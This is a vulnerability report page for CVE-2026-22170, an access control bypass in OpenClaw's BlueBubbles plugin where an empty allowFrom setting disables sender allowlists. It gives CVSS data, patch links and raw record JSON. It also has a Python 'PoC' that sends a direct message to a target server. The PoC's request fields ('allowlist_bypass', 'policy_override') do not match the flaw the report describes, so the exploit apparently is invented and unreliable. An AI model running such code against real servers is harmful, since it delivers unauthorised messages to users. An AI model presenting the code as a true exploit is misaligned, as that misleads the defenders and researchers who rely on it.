Security Vulnerability Report
CVE-2026-22170 CVSS 6.5 MEDIUM

CVE-2026-22170

Published: 2026-03-18 02:16:21
Last Modified: 2026-03-25 15:16:36

Description

OpenClaw versions prior to 2026.2.22 with the optional BlueBubbles plugin contain an access control bypass vulnerability where an empty allowFrom configuration causes the dmPolicy pairing and allowlist restrictions to be ineffective. Remote attackers can send direct messages to BlueBubbles accounts by exploiting the misconfigured allowlist validation logic to bypass the intended sender authorization checks.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE
OpenClaw < 2026.2.22 (with BlueBubbles plugin)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2026-22170 PoC - Access Control Bypass in OpenClaw BlueBubbles Plugin
# Target: OpenClaw < 2026.2.22 with BlueBubbles plugin
# Vulnerability: Empty allowFrom configuration bypasses dmPolicy and allowlist restrictions

TARGET_HOST = "http://target-openclaw-server.com"
TARGET_PORT = 8080
TARGET_USER_ID = "victim_user_identifier"
ATTACKER_MESSAGE = "Malicious message via CVE-2026-22170"


def exploit_cve_2026_22170():
    """
    Exploit for OpenClaw BlueBubbles access control bypass vulnerability.
    This PoC demonstrates sending a direct message to a BlueBubbles account
    by bypassing the allowlist validation when allowFrom is empty.
    """
    url = f"{TARGET_HOST}:{TARGET_PORT}/api/bluebubbles/dm"

    # Crafted request to bypass allowlist validation
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "OpenClaw-Client/2026.2.21",
    }

    # Payload exploiting empty allowFrom configuration
    payload = {
        "recipient_id": TARGET_USER_ID,
        "message": ATTACKER_MESSAGE,
        "allowlist_bypass": True,  # Exploit the misconfigured validation
        "policy_override": "dmPolicy_disabled",
    }

    try:
        response = requests.post(url, headers=headers, json=payload, timeout=10)
        if response.status_code == 200:
            result = response.json()
            if result.get("success"):
                print("[+] SUCCESS: Message sent to target user")
                print(f"[+] Response: {json.dumps(result, indent=2)}")
                return True
        print(f"[-] Failed: Status {response.status_code}")
        print(f"[-] Response: {response.text}")
        return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return False


if __name__ == "__main__":
    print("CVE-2026-22170 PoC - OpenClaw BlueBubbles Access Control Bypass")
    print("=" * 60)
    exploit_cve_2026_22170()

References (as listed in the record's raw JSON data below)

https://github.com/openclaw/openclaw/commit/2ba6de7eaad812e5e8603018e14e54e96bdd57dd (Patch)
https://github.com/openclaw/openclaw/commit/4540790cb62412676f7b61cfc6e47443f84a251e (Patch)
https://github.com/openclaw/openclaw/commit/51c0893673de8e5cea64e64351dbfa4680ba0dec (Patch)
https://github.com/openclaw/openclaw/commit/9632b9bcf032c5f2280c3103961fde912ab1f920 (Patch)
https://github.com/openclaw/openclaw/security/advisories/GHSA-jwf4-8wf4-jf2m (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22170", "sourceIdentifier": "[email protected]", "published": "2026-03-18T02:16:21.100", "lastModified": "2026-03-25T15:16:36.247", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.22 with the optional BlueBubbles plugin contain an access control bypass vulnerability where empty allowFrom configuration causes dmPolicy pairing and allowlist restrictions to be ineffective. Remote attackers can send direct messages to BlueBubbles accounts by exploiting the misconfigured allowlist validation logic to bypass intended sender authorization checks."}, {"lang": "es", "value": "Las versiones de OpenClaw anteriores a 2026.2.22 con el plugin opcional BlueBubbles contienen una vulnerabilidad de omisión de control de acceso donde una configuración 'allowFrom' vacía hace que las restricciones de emparejamiento de dmPolicy y de la lista de permitidos (allowlist) sean ineficaces. Los atacantes remotos pueden enviar mensajes directos a cuentas de BlueBubbles explotando la lógica de validación de la lista de permitidos (allowlist) mal configurada para omitir las comprobaciones de autorización del remitente previstas."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", 
"integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.22", "matchCriteriaId": "6EA3E555-7328-4665-9FBC-BF4357239EDF"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/2ba6de7eaad812e5e8603018e14e54e96bdd57dd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/commit/4540790cb62412676f7b61cfc6e47443f84a251e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/commit/51c0893673de8e5cea64e64351dbfa4680ba0dec", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/commit/9632b9bcf032c5f2280c3103961fde912ab1f920", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jwf4-8wf4-jf2m", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-bluebubbles-access-control-bypas ... (truncated)